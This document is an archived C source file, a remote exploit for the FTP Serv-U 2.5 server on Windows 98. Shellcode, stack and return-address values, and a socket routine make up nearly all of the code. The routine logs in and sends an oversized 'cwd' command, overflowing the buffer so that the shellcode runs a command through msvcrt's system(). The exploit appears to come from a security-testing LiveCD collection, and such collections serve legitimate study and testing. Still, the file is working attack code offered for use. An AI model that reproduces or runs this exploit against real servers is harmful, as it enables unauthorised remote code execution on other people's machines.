home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / servu / serv-u.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  3.9 KB  |  126 lines
  1. /*=============================================================================
  2.    FTP Serv-U Version 2.5 Exploit for Windows98
  3.    The Shadow Penguin Security (http://shadowpenguin.backsection.net)
  4.    Written by UNYUN (shadowpenguin@backsection.net)
  5.   =============================================================================
  6. */
  7. #include <stdio.h>
  8. #include <string.h>
  9. #include <netdb.h>
  10. #include <netinet/in.h>
  11. #include <sys/socket.h>
  12. #include <sys/types.h>
  13. #include <sys/time.h>
  14. #include <unistd.h>
  15.  
  16. #define  BUFSIZE    9000
  17. #define  FTP_PORT   21
  18. #define  RETADR     164
  19. #define  CODEOFS    200
  20. #define  FSTACKOFS  174
  21. #define  JMPOFS     6
  22. #define  MAXUSER    100
  23. #define  MAXPASS    100
  24. #define  EIP        0xbff7a027
  25. #define  FAKESTACK  0x80050101
  26. #define  NOP        0x90
  27. #define  JMPS       0xeb
  28.  
  29. unsigned char exploit_code[200]={
  30. 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
  31. 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
  32. 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
  33. 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
  34. 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
  35. 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
  36. 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
  37. 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
  38. 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
  39. 0xFF,0x00};
  40. unsigned char cmdbuf[200]="msvcrt.dll.system.exit.notepad.exe";
  41.  
  42.  
  43. void    sendcmd(int sockfd,char *packetbuf)
  44. {
  45.         int     i;
  46.  
  47.         write(sockfd,packetbuf,strlen(packetbuf));
  48.         while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
  49.             packetbuf[i]=0;
  50.             if(strchr(packetbuf,'\n')!=NULL) break;
  51.         }
  52. }
  53.  
  54. int     main(int argc,char *argv[])
  55. {
  56.         struct hostent      *hs;
  57.         struct sockaddr_in  cli;
  58.         char                packetbuf[BUFSIZE+3000],buf[BUFSIZE];
  59.         char                user[MAXUSER],pass[MAXPASS];
  60.         int                 sockfd,i,fakestack,ip,ebp,ins;
  61.  
  62.         if (argc<2){
  63.             printf("usage\n %s HostName {[username] [password]}\n",argv[0]);
  64.             exit(1);
  65.         }else if (argc==4){
  66.             strncpy(user,argv[2],MAXUSER-1); 
  67.             strncpy(pass,argv[3],MAXPASS-1);
  68.             user[MAXUSER-1]=0; pass[MAXPASS-1]=0;
  69.         }else{
  70.             strcpy(user,"anonymous");
  71.             strcpy(pass,"hoge@hohoho.com");
  72.         }
  73.         bzero(&cli, sizeof(cli));
  74.         cli.sin_family = AF_INET;
  75.         cli.sin_port = htons(FTP_PORT);
  76.         if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
  77.             if ((hs=gethostbyname(argv[1]))==NULL){
  78.                 printf("Can not resolve specified host.\n");
  79.                 exit(1);
  80.             }
  81.             cli.sin_family = hs->h_addrtype;
  82.             memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
  83.         }
  84.  
  85.         if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
  86.             perror("socket");  exit(0);
  87.         }
  88.  
  89.         if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
  90.             perror("connect"); exit(0);
  91.         }
  92.         while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
  93.             packetbuf[i]=0;
  94.             if(strchr(packetbuf,'\n')!=NULL) break;
  95.         }
  96.  
  97.         strcat(exploit_code,cmdbuf);
  98.         memset(buf,NOP,BUFSIZE);
  99.  
  100.         fakestack=FAKESTACK;
  101.         for (i=0;i<FSTACKOFS;i+=4){
  102.             buf[i  ]=fakestack&0xff;
  103.             buf[i+1]=(fakestack>>8)&0xff;
  104.             buf[i+2]=(fakestack>>16)&0xff;
  105.             buf[i+3]=(fakestack>>24)&0xff;
  106.         }
  107.         ip=EIP;
  108.         buf[RETADR  ]=ip&0xff;
  109.         buf[RETADR+1]=(ip>>8)&0xff;
  110.         buf[RETADR+2]=(ip>>16)&0xff;
  111.         buf[RETADR+3]=(ip>>24)&0xff;
  112.         buf[RETADR+4]=JMPS;
  113.         buf[RETADR+5]=JMPOFS;
  114.         memcpy(buf+CODEOFS,exploit_code,strlen(exploit_code));
  115.         buf[BUFSIZE]=0;
  116.  
  117.         sprintf(packetbuf,"user %s\r\n",user);
  118.         sendcmd(sockfd,packetbuf);
  119.         sprintf(packetbuf,"pass %s\r\n",pass);
  120.         sendcmd(sockfd,packetbuf);
  121.         sprintf(packetbuf,"cwd %s\r\n",buf);
  122.         sendcmd(sockfd,packetbuf);
  123.  
  124.         close(sockfd);
  125. }
  126.